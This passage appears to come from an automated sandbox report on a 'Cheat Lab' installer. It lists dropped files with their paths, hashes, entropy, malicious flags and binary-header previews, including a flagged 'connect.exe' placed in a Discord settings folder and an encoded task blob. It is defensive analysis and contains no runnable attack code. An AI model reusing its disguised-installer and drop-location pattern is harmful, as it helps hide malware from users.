                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orwxlzxb.cw1.psm1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z4na4rs3.hap.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5m430pb.ko3.ps1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1074015689
                                                                                                                                                                      Entropy (8bit):0.0048756959434813766
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:
                                                                                                                                                                      MD5:DECF64C46889E5C44B7924E5318FC57E
                                                                                                                                                                      SHA1:8F1805C6F77844A6754738B371178C25FDF04630
                                                                                                                                                                      SHA-256:B8E1072E5CF3C7695E0736D2EA09CC4CEDCC90F5285D0F0D0DF9A6994B3BE8CB
                                                                                                                                                                      SHA-512:D131BC345B2398ECC360A1D47FB8D767350182F0A8E726E3C7B96A58D4C790A7B90B9ABC5EE071112823CD6888FD3F123D76C6FF74AF33C8A7825F852D5CFCD4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.B.>.,.>.,.>.,. .$.,. ...,. .y.,...q.=.,.>.-.l.,.7..?.,.7..?.,.Rich>.,.........PE..L.....He..........................................@..........................p...............................................e.......................................................................................................................text....f.......h.................. ..`.bss.....!......."...l.............. ..`.rdata..............................@..@.data............|..................@....jkqvbz......`.......&..................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\Pictures\9E146BE9C76A4720BCDB53011B87BD06.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2064
                                                                                                                                                                      Entropy (8bit):3.9639720886787493
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YM0gQlcfcTnXRfhZa87MHV9fEgptajQAs9l:fQfnBZcgWcgptyQAs7
                                                                                                                                                                      MD5:C12B426B11A7B95D2DF7EF2D2F2EFE5F
                                                                                                                                                                      SHA1:F8C22CCBADFB5A38816EC727B0B5768801FDDE2E
                                                                                                                                                                      SHA-256:1BC0AF7D72B09BE2CE4A18EBDAAD7D1BDE137EA5FC3ED0203A02F713499015A6
                                                                                                                                                                      SHA-512:9F3A903F78579399E9589876756FA3EBA2C052F32ACDC31A80E5A1D129CAC1F1926E0E231DC45B4AD8EECC1BFD1178BB52BFF11D322BEAA8CA6920B66BD939C8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsNmYsYTksNzcsODIsNmEsODEsOWUsODUsOGEsYTMsODUsOTEsOTcsOTQsNmQsNzMsYTUsOGIsYTQsN2MsYTcsNzcsNmIsNjYsNzksODIsOTQsOGQsOTcsOGYsN2YsNmIsNzAsYTIsN2MsN2UsNjMsN2MsZTAsYzQsYzYsOGQsODAsN2EsODksYzgsYTEsYjAsZDksYjksZGQsYWMsZWIsYWIsNTYsNmMsNjEsNzMsYTQsYzUsZDUsOWMsYTcsYWMsOWEsOTIsNmYsNmYsNTMsYjQsZDUsYjgsYjcsY2EsYzIsYmIsZDQsYzcsNWEsN2UsOTQsN2MsYjEsYjQsZWEsYTYsYTMsYTQsYTUsYWQsYmYsYTgsY2EsY2MsYmEsYTEsYTcsZDcsYjYsYWIsOGQsYjEsZGIsYmEsYzAsZDAsYjcsY2UsOTUsYzcsYjAsYTksOTYsODYsOGQsNmQsZWEsYjcsOTUsYTQsYjUsNzMsOWQsNzUsOTYsODQsNjYsNWEsOWEsZTUsYjcsYmUsYTMsYzMsZGEsNmUsOGMsOGIsODQsODYsODcsODQsYWEsYTksZTAsYmIsZTIsYjksZGEsYWIsNTYsNmMsNjEsODEsOGYsNzUsODcsYzAsYWYsOWMsOWUsOTIsN2QsNmYsNjIsN2EsOGMsNmUsYzIsZTAsYzEsY2EsODksOWMsNTgsYmYsOTYsY2QsZDYsYzUsZGMsNjUsNm

                                                                                                                                                                      C:\Windows\Installer\66bc0c.msi

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}, Number of Words: 2, Subject: Cheat Lab, Author: Cheat Lab Inc., Name of Creating Application: Cheat Lab, Template: x64;1033, Comments: This installer database contains the logic and data required to install Cheat Lab., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2020352
                                                                                                                                                                      Entropy (8bit):7.183219452373841
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:1VkldbW8zBQSc0ZnSK/uxtZCZKumZrROOsLRTtA:mo0ZnPux4KdsLRTtA
                                                                                                                                                                      MD5:5395845C70FD2495F0407291BE32201C
                                                                                                                                                                      SHA1:A76288FE27B9684ED8D141B50AA55437833ED1A2
                                                                                                                                                                      SHA-256:338F6A75E6E11459A5CEDB3A2917F9B3F9FCB4991FEC84514692B649393EA3BB
                                                                                                                                                                      SHA-512:6550AE020F597FBF37FD56582EEC4911B2CAC7860D510F54C2E68CCC4A3ACD4EC04734BA0A683B1B04DE15C9832F3F8CE4524C177D8F234AAE6A43354B33C71A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>.......................................................[.......W...............................................,...-......./...0...1...2.......s...t...u...v...w...x...y...z.......................................................................................................................................................................................................................................................................................................................................T...........#...0............................................................................................... ...!...".../...$.......&...'...(...)...*...+...,...-.......6...1...B...2...3...4...5...8...7...?...9...:...;...<...=...>...H...@...A...U...C...D...E...F...G...........J...K...L...M...N...O...P...Q...R...S...........V...W...X...Y...Z...........]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                      C:\Windows\Installer\MSIBD45.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIBDB3.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIBE12.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIBE32.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIBE81.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):191968
                                                                                                                                                                      Entropy (8bit):6.4059654303545885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                      MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                      SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                      SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                      SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIBEB1.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):785324
                                                                                                                                                                      Entropy (8bit):6.51909311320731
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:waHRuEs3Xmm9DZE8aHRuEs3Xmm9DZEEMvZx0FlS68zBQSncb4ZPQTpAjZxqO1k:w25snmmtZx25snmmtZlMvZCFlp8zBQSa
                                                                                                                                                                      MD5:31F5B4CDF0236B1BC3E5879A04E3D9BC
                                                                                                                                                                      SHA1:F1E0830929725490F465E637A5060547FD8747D7
                                                                                                                                                                      SHA-256:7ACBC931D80BC97FC223BDA0C43E5527203C209F252DD1910FCD907A1CCB10CA
                                                                                                                                                                      SHA-512:7BF30E3A5002BA923F6FD473D186DB669B59061E8CEFDBEE98161DF6E067D46110260279DAD750A5C0FD646D1237B328CB1C883264001203762F826DA28FC48A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@b|fW.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{3C7A1E44-AA05-4B3F-B2A1-48DCB7D1B307}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]J...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@

                                                                                                                                                                      C:\Windows\Installer\MSIBF2F.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):191968
                                                                                                                                                                      Entropy (8bit):6.4059654303545885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                      MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                      SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                      SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                      SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSIC01A.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):399328
                                                                                                                                                                      Entropy (8bit):6.589290025452677
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                      MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                      SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                      SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                      SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\MSICA9B.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):446944
                                                                                                                                                                      Entropy (8bit):6.403916470886214
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                      MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                      SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                      SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                      SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\SourceHash{E0E46653-343B-4459-B5BD-ED25C554CD5C}

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.1666352704109029
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:JSbX72FjF/iAGiLIlHVRp+h/7777777777777777777777777vDHFdpJaN1l0i8Q:JGQI5Wf6yF
                                                                                                                                                                      MD5:86F2F4A1E287FA9A743F7D5C8D0C0B2A
                                                                                                                                                                      SHA1:C58AA360185A4E9675842E31035EB41C6CF6B062
                                                                                                                                                                      SHA-256:A76F203F73DC80093DC8B5D9AFE38E3461E211B4DDB93ABAD3628D7E04F0F637
                                                                                                                                                                      SHA-512:EF7C8A3228F3DF4AA6FE0314CA8A11FBFF50B7AFE837640559D3449F7C50D071F8EC6542E6FEAC62398399840F066BAA2A50183E31C644A7D47BAC09179C60A3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                      Entropy (8bit):1.5743000234948372
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:M8Ph4uRc06WXJIFT51Y8hdWQSkdWbVAEkrCy9BoxdW9SkdW/TCS:jh41rFTrY8Z+eRCg
                                                                                                                                                                      MD5:11982618A512C8E47D7898081AA95E75
                                                                                                                                                                      SHA1:AAD198CC2CCB213EF05AAD6FD9E32EE257796AC3
                                                                                                                                                                      SHA-256:5998C75E73FBC03580D6A93614C37ABBC372B59ACF773A7AE9C3A6FBF0786886
                                                                                                                                                                      SHA-512:75D36019BE3A5F956D3808AEBFC963A805DCA689A32D5428482FCE8E13EE0E612DAA32DB82D73F9901815E955065F5460C74B5E1BEE9C0A9B6DB30E3E096F214
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):360001
                                                                                                                                                                      Entropy (8bit):5.362975409720396
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauK:zTtbmkExhMJCIpEj
                                                                                                                                                                      MD5:3E5D91A1B7772A6AE1F58393BC8767B6
